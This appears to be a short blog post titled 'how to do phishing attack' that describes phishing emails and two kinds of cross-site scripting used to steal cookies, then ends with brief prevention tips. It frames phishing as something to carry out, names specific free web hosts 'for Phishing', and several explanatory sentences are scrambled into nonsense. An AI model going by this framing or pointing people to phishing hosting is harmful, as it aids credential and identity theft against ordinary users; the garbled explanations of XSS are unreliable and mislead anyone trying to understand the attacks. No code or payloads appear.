Cyber-SecurityHacks & Tricks

how to do phishing attack (Advanced Social Engineering )

   What is Phishing Scam?

Phishing attacks use both social engineering and to steal consumer’s personal identity data and financial account credentials. Social-engineering schemes use ‘spoofed’ emails to lead a user to counterfeit websites designed to trick recipients into divulging data such as credit card numbers, account usernames, passwords and social security numbers. Hijacking brands names of banks , E-Commerce and credit card companies , phishers often convince recipients to respond

phishing1-gopcsoft

      The Common Method of Phishing

pISHING-GOPCSOFT

                 Other Methods of  Communication

                   Email
                   Instant Messages
                   Message Boards
                   Guestbooks
                   Blog Comments
                   Viruses, Trojan Horses, Spyware
                   etc.

Cross-Site Scripting (XSS)

Targets the user, not the website
Javascript is what makes XSS dangerous (very dominant language)
Most commonly found web vulnerability
Impact underestimated or misunderstood

Type 1 (click the link)

 A most common variety of XSS Requires the victim to click a link .When the victim clicks and the JavaScript code executes,and Cookies which is stored in your browser might be in the hands of the attacker.  it does so in the context of the victim domain.

 Attacker sends the user an email containing a code which specially Attacker retrieves the cookies from crafted link.The Spoofed email looking legitimate and laced with where they can be used to hijack embedded JavScript code. When the user clicks the link  the attacker retrieves Users session or cookies which usually contains your web activities

phishing2-gopcsoft

                 Type 2 (HTML Injection)                             

 A most dangerous variety of XSS Does not require a user click, just visit a web page. Commonly found in HTML E-Mail, Message Boards, and Blog posts

When User clicks to view an email message sent by an Attacker. The email message contains JavaScript from the web server logs where it contains exploit code which executes automatically,When the user loads the page, Attacker retrieves the cookies from the user Browser

phishing3-gopcsoft

               XSS Can Be Used To…

  • Steal cookies and hijack sessions
  • Execute unintended website functionality
  • Harass users with malicious code
  • Alter any portion of the web page

Free Web Hosting Sites  for Phishing 

  • www.my3gb.com/

  • https://www.000webhost.com

How to Prevent Phishing Attack

  •  Never click a scam Email
  •  Daily clear your cookies
  •  Never visit a Scam Website which is not safe
  • Never participate in a survey
  • Install Internet security software

The source of this Article is a  pdf by Anonymous guy which i got from the internet.

Comment here

This site uses Akismet to reduce spam. Learn how your comment data is processed.